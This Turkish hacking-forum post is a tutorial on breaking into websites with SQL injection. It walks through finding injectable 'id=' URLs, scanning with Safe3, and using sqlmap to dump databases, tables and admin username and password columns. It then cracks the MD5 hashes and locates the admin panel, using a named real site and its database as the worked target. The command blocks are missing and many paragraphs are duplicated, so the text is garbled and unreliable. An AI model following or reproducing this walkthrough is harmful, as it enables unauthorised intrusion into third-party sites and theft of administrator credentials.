+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +
+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +
+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +
[/FONT][FONT="]Sorun Yaşayanlar Aşağıdaki Linklerden İndirsin[/FONT][FONT="]
+ sqlmap: automatic SQL injection and database takeover tool +
+ https://www.python.org/download/releases/2.7/ +
[/FONT][FONT="]
Dosyaları İndir [Yandex.Disk 22.6 MB]
Veteran SQLMap Helper(SQLMAP Kod Yardımcısı)
[/FONT][FONT="]SQLMAP'ı CMD İle Çalıştırma[/FONT][FONT="]
[/FONT][FONT="]Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:\" dizinine gelene kadar şu kodu yazalım ; [/FONT]
[FONT="]Kod:[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;[/FONT]
[/FONT][FONT="]Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;[/FONT]
[FONT="]Kod:[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.[/FONT][FONT="]
[/FONT][FONT="]SQL Açıklı Site Bulma[/FONT][FONT="]
[/FONT][FONT="]Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "title.php?id=5" gibi.
[/FONT][FONT="]
[/FONT][FONT="]Örnek Site : [/FONT][FONT="]Sea of Stories -Book
[/FONT][FONT="]Yukarıda verdiğin örnek site linkine tıklayın açın linkin sonunda "title.php?id=5193" var manuel sql açığı bulacaksanız bu ıd değerinin sonuna örneğin " ' " tek tırnak koyun yani şu şekilde ; [/FONT]
[/FONT][FONT="]Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.[/FONT][FONT="]
[/FONT][FONT="]SQL Açıklı Site Bulma[/FONT][FONT="]
[/FONT][FONT="]Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "title.php?id=5" gibi.
[/FONT][FONT="]
[/FONT][FONT="]Örnek Site : [/FONT][FONT="]Sea of Stories -Book
[/FONT][FONT="]Yukarıda verdiğin örnek site linkine tıklayın açın linkin sonunda "title.php?id=5193" var manuel sql açığı bulacaksanız bu ıd değerinin sonuna örneğin " ' " tek tırnak koyun yani şu şekilde ; [/FONT]
[FONT="]Kod:[/FONT]
[FONT="]URL'nin sonuna tırnak koyup enter tuşuna basın farkedeceksinizki site bir hata veriyor[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Bu sitede SQL İnjection açığı vardır.
Not : Dilerseniz verdiğim .rar dosyasındaki Safe3 adlı programla sitelerde SQL İnj. taraması yapabilirsiniz
[/FONT]
Not : Dilerseniz verdiğim .rar dosyasındaki Safe3 adlı programla sitelerde SQL İnj. taraması yapabilirsiniz
[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
Gördüğünüz gibi Safe3 ile tarattığımızda örnek sitemizde bir çok SQL İnjection açığı tespit ediyor.
[/FONT][FONT="]
[/FONT][FONT="]SQLMAP İle Veritabanını Çekme[/FONT][FONT="]
[/FONT][FONT="]SQL İnjection açıklı sitemizi bulduk şimdi SQLMAP ile bu sitenin veritabanı bilgilerini çekelim.[/FONT][FONT="]
[/FONT][FONT="]1. Adım : Sitenin Veritabanı İsimlerini Çekme (Database)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız[/FONT]
Gördüğünüz gibi Safe3 ile tarattığımızda örnek sitemizde bir çok SQL İnjection açığı tespit ediyor.
[/FONT][FONT="]
[/FONT][FONT="]SQLMAP İle Veritabanını Çekme[/FONT][FONT="]
[/FONT][FONT="]SQL İnjection açıklı sitemizi bulduk şimdi SQLMAP ile bu sitenin veritabanı bilgilerini çekelim.[/FONT][FONT="]
[/FONT][FONT="]1. Adım : Sitenin Veritabanı İsimlerini Çekme (Database)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Yani biz yukarıda bulduğumuz siteyi çekmek için şu şekilde yazacağız[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım [/FONT][FONT="]
[/FONT]
[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz [/FONT][FONT="]
[/FONT][FONT="]Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi[/FONT][FONT="]
[/FONT]
[/FONT][FONT="]ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz [/FONT][FONT="]
[/FONT][FONT="]Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi[/FONT][FONT="]
[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]2. Adım : Veritabanı Tablolarını Çekme (Tables)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız[/FONT]
[/FONT][FONT="]2. Adım : Veritabanı Tablolarını Çekme (Tables)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir.[/FONT][FONT="]
[/FONT]
[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.[/FONT][FONT="]
[/FONT][FONT="]3. Adım : Veritabanı Tablolarınının Kolonlarını Çekme (Columns)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız[/FONT]
[/FONT][FONT="]İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.[/FONT][FONT="]
[/FONT][FONT="]3. Adım : Veritabanı Tablolarınının Kolonlarını Çekme (Columns)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.[/FONT][FONT="]
[/FONT]
[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[FONT="]
[/FONT][FONT="]Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.[/FONT][FONT="]
[/FONT][FONT="]4. Adım : Kolonlardaki Verileri Çekme (Dump)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız[/FONT]
[/FONT][FONT="]Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.[/FONT][FONT="]
[/FONT][FONT="]4. Adım : Kolonlardaki Verileri Çekme (Dump)[/FONT][FONT="]
[/FONT][FONT="]SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları[/FONT]
[FONT="]Kod:[/FONT]
[FONT="]Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.[/FONT][FONT="]
[/FONT][FONT="]Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.[/FONT][FONT="]
[/FONT][FONT="]Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız [/FONT]
[/FONT][FONT="]Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.[/FONT][FONT="]
[/FONT][FONT="]Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız [/FONT]
[FONT="]Kod:[/FONT]
[FONT="]
[/FONT][FONT="]Paneli Bulma[/FONT][FONT="]
[/FONT][FONT="]+ Online panel tarayıcı :[/FONT][FONT="] Fastest Online Admin Panel Finder [/FONT][FONT="]+[/FONT][FONT="]
[/FONT][FONT="]Bu tarz panel tarayıcılarla önce taratın , havijin tarayıcısı ile vs taratın eğer olmaz ise dosyada verdiğim "İntelli Tamper" adlı programla aşağıdaki gibi sitenin dosyalarını görebilirsiniz.[/FONT][FONT="]
[/FONT]
[/FONT][FONT="]Paneli Bulma[/FONT][FONT="]
[/FONT][FONT="]+ Online panel tarayıcı :[/FONT][FONT="] Fastest Online Admin Panel Finder [/FONT][FONT="]+[/FONT][FONT="]
[/FONT][FONT="]Bu tarz panel tarayıcılarla önce taratın , havijin tarayıcısı ile vs taratın eğer olmaz ise dosyada verdiğim "İntelli Tamper" adlı programla aşağıdaki gibi sitenin dosyalarını görebilirsiniz.[/FONT][FONT="]
[/FONT]
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.
[/FONT][FONT="]İntelli Tamper ile site dosyalarını çektiğinizde manuel olarak paneli tespit edebilirsiniz dosyaları dizinleri inceleyerek.[/FONT][FONT="]
[/FONT][FONT="]Gerekebilecek Şeyler[/FONT][FONT="]
[/FONT][FONT="]+ Online panel tarayıcı :[/FONT][FONT="] Fastest Online Admin Panel Finder [/FONT][FONT="]+[/FONT][FONT="]
[/FONT][FONT="]+ İçinde SQL Dork Bulunan Kendi Yapımım Olan Dork Programı : [/FONT][FONT="]Veteran Dork Studio 3
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[FONT="]EĞER BURDAN BİŞEY A[FONT="]NLAMADIYSANIZ LİNKE TIKLAYIN
http://www.turkhackteam.org/web-ser...n-hack-windows-cmd-uzerinden-veteran-7-a.html[/FONT][/FONT]
[/FONT]
PAYLAŞMIMIN ÇOK İŞE YARAMSA DİLEĞİYLE İYİ GÜNLER
[FONT="]NOT=LÜTFEN BİR TEŞEKKÜRÜ ÇOK GÖRMEYİN:RpS_thumbsup: :RpS_thumbsup:
[/FONT]
Son düzenleme: